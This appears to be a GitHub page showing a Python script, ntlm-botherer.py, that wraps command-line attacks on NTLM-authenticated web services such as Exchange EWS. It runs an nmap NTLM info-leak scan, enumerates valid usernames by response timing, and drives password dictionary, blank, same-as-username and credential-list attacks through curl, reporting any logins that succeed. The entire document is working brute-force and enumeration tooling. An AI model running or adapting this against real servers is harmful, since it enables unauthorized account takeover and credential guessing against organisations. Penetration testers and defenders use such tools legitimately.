random-scripts/ntlm-botherer.py at master · strawp/random-scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
#!/usr/bin/python3
# Simple wrapper for some command line NTLM attacks

import argparse
import sys
import os.path
import subprocess
from urllib.parse import urlparse
import re
import time
import signal

def test_login( username, password, url, http1_1 = False ):
  global args, found, foundusers
  username = username.strip()
  password = password.strip()

  # Skip this attempt if we already have credentials for this user
  if username in foundusers:
    return False

  print("[*] Testing " + username + " : " + password)
  # cmd = "curl -s -I --ntlm --user " + username + ":" + password + " -k " + url
  try:
    cmd = ["curl", "-s", "-I", "--ntlm", "--user", username + ":" + password, "-k"]
    if http1_1:
      cmd.append( '--http1.1' )
    if args.cert and args.key:
      cmd.extend(['--cert',args.cert,'--key',args.key])
    cmd.append(url)
    out = subprocess.check_output( cmd ).decode('utf8')
    if args.debug:
      print( out )
    m = re.findall( r"HTTP\/\d.\d (\d{3})", out )
    for code in m:
      if code != "401":
        print("[+] FOUND: " + username + " : " + password)
        found.append( username + " : " + password )
        foundusers.append( username )
        if args.quitonsuccess:
          sys.exit(0)
        if args.delay:
          time.sleep(args.delay)
        return True

    if args.delay:
      time.sleep(args.delay)
  except SystemExit:
    raise
  except:
    print('ERROR: curl call failed')
  return False

def show_found():
  if len( found ) > 0: print("Found:\n - " + "\n - ".join(found))
  else: print("No creds found :(")

def cancel_handler(signal=None,frame=None):
  print("Caught ctrl-c, quitting...")
  show_found()
  sys.exit(0)

signal.signal(signal.SIGINT, cancel_handler)

parser = argparse.ArgumentParser(description="Wrapper for NTLM info leak and NTLM dictionary attack")
parser.add_argument("-i", "--info", action="store_true", help="Exploit NTLM info leak")
parser.add_argument("-e", "--enumerate", action="store_true", help="Attempt time-based username enumeration on URL")
parser.add_argument("-c", "--credslist", help="File with list of credentials in <username>:<password> format to use")
parser.add_argument("-u", "--user", help="Username to dictionary attack as")
parser.add_argument("-U", "--userlist", help="Username list to dictionary attack as")
parser.add_argument("-p", "--password", help="Password to dictionary attack as")
parser.add_argument("-d", "--domain", help="NTLM domain name to attack")
parser.add_argument("-P", "--passlist", help="Password list to dictionary attack as")
parser.add_argument("-D", "--delay", help="Delay between each attempt, in seconds")
parser.add_argument("-s", "--same", action="store_true", help="Try password=username")
parser.add_argument("-b", "--blank", action="store_true", help="Try blank password")
parser.add_argument("-1", "--quitonsuccess", action="store_true", help="Stop as soon as the first credential is found")
parser.add_argument("--debug", action="store_true", help="Output debug info")
parser.add_argument("--http1_1", action="store_true", help="Force use of HTTP 1.1 (if you're getting \"curl call failed\" errors due to HTTP2)")
parser.add_argument("--cert", nargs='?', help="Client side PEM cert file")
parser.add_argument("--key", nargs='?', help="Client side PEM key file")
parser.add_argument("url", help="URL of NTLM protected resource, e.g. https://webmail.company.com/ews/exchange.asmx")
args = parser.parse_args()

if not args.url:
  parser.print_usage()
  sys.exit(2)

print()

if args.delay:
  args.delay = int(args.delay)

url = urlparse(args.url)
if not url.port:
  if url.scheme == 'https':
    port = 443
  else:
    port = 80
else:
  port = url.port

found = []
foundusers = []

print('Running against ' + url.geturl())

if args.info:
  # Run NTLM info leak
  cmd = "nmap -p" + str(port) + " --script http-ntlm-info --script-args http-ntlm-info.root="+url.path+" "+url.netloc
  print(cmd)
  os.system( cmd )

# Attempt time-based username enumeration. Valid users are quicker to respond on MS mail servers
# Inspired by: https://github.com/busterb/msmailprobe
if ( args.user or args.userlist ) and args.enumerate:
  userlist = []
  enumerated = []
  if args.user: userlist.append(args.user)
  if args.userlist:
    with open( args.userlist, "r" ) as f:
      for u in f.read().splitlines():
        userlist.append(u)

  # Generate fake usernames
  import random, string
  fakeusers = []
  for i in range(10):
    fakeusers.append(''.join(random.choices(string.ascii_lowercase + string.digits, k=10)))

  # Determine an average response time for fake usernames
  print('Working out an average response time for invalid usernames...' )
  import time, statistics
  responsetimes = []
  for u in fakeusers:
    start = round(time.time() * 1000)
    test_login( u, 'ThisIsNotAnyonesRealPasswordIShouldHope', url.geturl(), args.http1_1 )
    responsetimes.append(round(time.time() * 1000) - start)
  avgresponse = statistics.mean( responsetimes )
  print('\nAverage response time:',avgresponse,'ms')

  # Run through each user, compare to average
  for u in userlist:
    start = round(time.time() * 1000)
    test_login( u, 'ThisIsNotAnyonesRealPasswordIShouldHope', url.geturl(), args.http1_1 )
    elapsed = round(time.time() * 1000) - start
    print('Elapsed:', elapsed)

    # If it's significantly less than average, it's valid. I guess we're hard-coding the significance!
    if elapsed < (avgresponse * 0.77):
      enumerated.append( u )
      print("[+] " + u )
    else:
      print("[-] " + u )

  print('Finished enumeration.')
  if len( enumerated ) > 0:
    print( 'Valid users:\n\n' + '\n'.join(enumerated))
  else:
    print( 'No valid users found :(' )

if (( args.user or args.userlist ) and ( args.password or args.passlist )) or args.credslist:

  # Check user
  if args.userlist and not os.path.isfile(args.userlist):
    print('Couldn\'t find ' + args.userlist)
    parser.print_usage()
    sys.exit(2)

  # Check password
  if args.passlist and not os.path.isfile(args.passlist):
    print('Couldn\'t find ' + args.passlist)
    parser.print_usage()
    sys.exit(2)

  # Check user
  if args.credslist and not os.path.isfile(args.credslist):
    print('Couldn\'t find ' + args.credslist)
    parser.print_usage()
    sys.exit(2)

  if args.passlist:
    print("Password list")
    fp = open( args.passlist, "r" )

    if args.user:
      if args.same:
        test_login( args.user, args.user, url.geturl(), args.http1_1 )
      if args.blank:
        test_login( args.user, '', url.geturl(), args.http1_1 )
    elif args.userlist:
      fu = open( args.userlist, "r" )
      for u in fu:
        # Loop over blank / same for when multiple passes and users
        if args.same:
          test_login( u, u, url.geturl(), args.http1_1 )
        if args.blank:
          test_login( u, '', url.geturl(), args.http1_1 )
      fu.close()

    for p in fp:
      if args.userlist:
        fu = open( args.userlist, "r" )
        for u in fu:
          # many users, many passwords
          test_login( u, p, url.geturl(), args.http1_1 )
        fu.close()
      else:
        # One user, many passwords
        test_login( args.user, p, url.geturl(), args.http1_1 )
    fp.close()
  elif args.userlist:
    print("User list")
    fu = open( args.userlist, "r" )
    for u in fu:
      # Many users, one password
      test_login( u, args.password, url.geturl(), args.http1_1 )
      if args.same:
        test_login( u, u, url.geturl(), args.http1_1 )
      if args.blank:
        test_login( u, '', url.geturl(), args.http1_1 )
    fu.close()
  elif args.credslist:
    print('Creds list')
    fp = open( args.credslist, "r" )
    for line in fp:
      line = line.strip()
      if line == '':
        continue
      creds = line.split(':')
      if len( creds ) < 2:
        print('No username / pass combination in: ' + line)
        continue
      test_login(creds[0], ':'.join(creds[1:]), url.geturl(), args.http1_1)
  else:
    # One user, one password
    print("Single user / password")
    if args.blank:
      test_login( args.user, '', url.geturl(), args.http1_1 )
    if args.same:
      test_login( args.user, args.user, url.geturl(), args.http1_1 )
    test_login( args.user, args.password, url.geturl(), args.http1_1 )

  show_found()

print("Done")